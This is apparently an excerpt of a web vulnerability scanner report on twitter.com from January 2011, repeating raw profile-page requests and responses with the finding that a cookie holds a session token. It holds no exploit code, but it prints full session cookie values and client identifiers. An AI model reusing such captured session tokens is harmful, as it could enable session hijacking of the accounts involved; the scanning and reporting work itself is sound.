_twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /benmezrich HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;
Response
HTTP/1.0 200 OK Date: Sat, 29 Jan 2011 01:52:50 GMT Server: hi Status: 200 OK X-Transaction: 1296265970-66900-52833 ETag: "c5b0a06ada9d5c4864087cf3c0c522b7" Last-Modified: Sat, 29 Jan 2011 01:52:50 GMT X-Runtime: 0.01562 Content-Type: text/html; charset=utf-8 Content-Length: 50003 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /bennadel HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:30 GMT Server: hi Status: 200 OK X-Transaction: 1296225029-56076-61608 ETag: "241ca6186e49f64c12f595a689635dc8" Last-Modified: Fri, 28 Jan 2011 14:30:29 GMT X-Runtime: 0.64571 Content-Type: text/html; charset=utf-8 Content-Length: 49758 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIiBodHRwOi8vdHdpdHRlci5jb20vYmVubmFkZWw6%250ADGNzcmZfaWQiJTEyNDM3NmU5Zjg3ODYwNmJiMWM2YjQ0MzhhNmM0NTM5Og9j%250AcmVhdGVkX2F0bCsIM07wzC0BOgdpZCIlMWM5NTM0ODFhNDJmZGU5YzBjNzRh%250AZWQ1NzkxZjJmNjQiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNo%250AOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA%253D--d2adbee25df14d0172349a6c3fd5e58e45975083; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /bostonherald HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;
Response
HTTP/1.0 200 OK Date: Sat, 29 Jan 2011 01:41:20 GMT Server: hi Status: 200 OK X-Transaction: 1296265280-17400-32279 ETag: "e1a9ca3ce3850d33d8312521c7367bdc" Last-Modified: Sat, 29 Jan 2011 01:41:20 GMT X-Runtime: 0.00787 Content-Type: text/html; charset=utf-8 Content-Length: 38696 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /business HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 301 Moved Permanently Date: Fri, 28 Jan 2011 14:31:19 GMT Server: hi Status: 301 Moved Permanently X-Transaction: 1296225079-95247-27498 Last-Modified: Fri, 28 Jan 2011 14:31:19 GMT Location: http://business.twitter.com/ X-Runtime: 0.01339 Content-Type: text/html; charset=utf-8 Content-Length: 94 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<html><body>You are being <a href="http://business.twitter.com/">redirected</a>.</body></html>
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cjronson HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;
Response
HTTP/1.0 200 OK Date: Sat, 29 Jan 2011 01:54:02 GMT Server: hi Status: 200 OK X-Transaction: 1296266042-1314-53197 ETag: "57db21f7394d7e31ecaad1a1f749d095" Last-Modified: Sat, 29 Jan 2011 01:54:02 GMT X-Runtime: 0.01554 Content-Type: text/html; charset=utf-8 Content-Length: 51916 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cowboy HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:31:00 GMT Server: hi Status: 200 OK X-Transaction: 1296225060-85333-1036 ETag: "257ca8de3359b561c58908e572d9840c" Last-Modified: Fri, 28 Jan 2011 14:31:00 GMT X-Runtime: 0.01434 Content-Type: text/html; charset=utf-8 Content-Length: 52646 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /creationix HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:38 GMT Server: hi Status: 200 OK X-Transaction: 1296225038-68082-17773 ETag: "b84f4f9cc8d7f0be4a449ccb6ba5ef8c" Last-Modified: Fri, 28 Jan 2011 14:30:38 GMT X-Runtime: 0.01145 Content-Type: text/html; charset=utf-8 Content-Length: 52514 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dandenney HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:59 GMT Server: hi Status: 200 OK X-Transaction: 1296225059-14036-20243 ETag: "b216b5fbcf2d794e1118d2a88b30a946" Last-Modified: Fri, 28 Jan 2011 14:30:59 GMT X-Runtime: 0.01217 Content-Type: text/html; charset=utf-8 Content-Length: 54426 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /danwrong HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:44 GMT Server: hi Status: 200 OK X-Transaction: 1296225044-52425-1613 ETag: "e308391ad5a4a27e5094e4fd0c33693a" Last-Modified: Fri, 28 Jan 2011 14:30:44 GMT X-Runtime: 0.01151 Content-Type: text/html; charset=utf-8 Content-Length: 50051 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /davevogler HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:46 GMT Server: hi Status: 200 OK X-Transaction: 1296225046-53952-21746 ETag: "2ad3827a054ebfaafa3ae7d33a059d42" Last-Modified: Fri, 28 Jan 2011 14:30:46 GMT X-Runtime: 0.01106 Content-Type: text/html; charset=utf-8 Content-Length: 53247 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /deionbranch84 HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;
Response
HTTP/1.0 200 OK Date: Sat, 29 Jan 2011 01:41:27 GMT Server: hi Status: 200 OK X-Transaction: 1296265287-45791-20728 ETag: "cf921750730cd97318f25ed57b09cad3" Last-Modified: Sat, 29 Jan 2011 01:41:27 GMT X-Runtime: 0.01145 Content-Type: text/html; charset=utf-8 Content-Length: 50211 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dougneiner HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
